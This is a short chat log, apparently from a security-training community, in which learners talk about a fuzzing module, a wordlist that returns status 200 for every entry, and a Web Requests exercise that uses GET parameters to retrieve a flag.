doing that module as well now, seems like one of the biggest modules I've done so far 😄
nice! jep, it's extensive 🙂
Also stuck!
@quick hollow I actually solved it but didn't take any notes so i only vaguely remember what i did. I might have done: ls /
Maybe you can dm me, there is an output of everything in seclists but doesn't have the results of which really gives 200 response
That's the output
Gives status 200 for everything in the wordlist
I wonder if there will ever be a module about fuzzing/vuln discovery through static and dynamic code analysis
beyond the vanilla buffer overflow 🙂
that would be so cool 😄
forgive me if this has been answered already but I have a question regarding the Web Requests / GET method. First question asks to send a GET request to flag.php to include the two parameters that equal 1337. I can complete and get the flag in a web browser, I can complete and get the flag with a curl command. Is the question on the page broken maybe? It seems that nothing I put in will satisfy it.


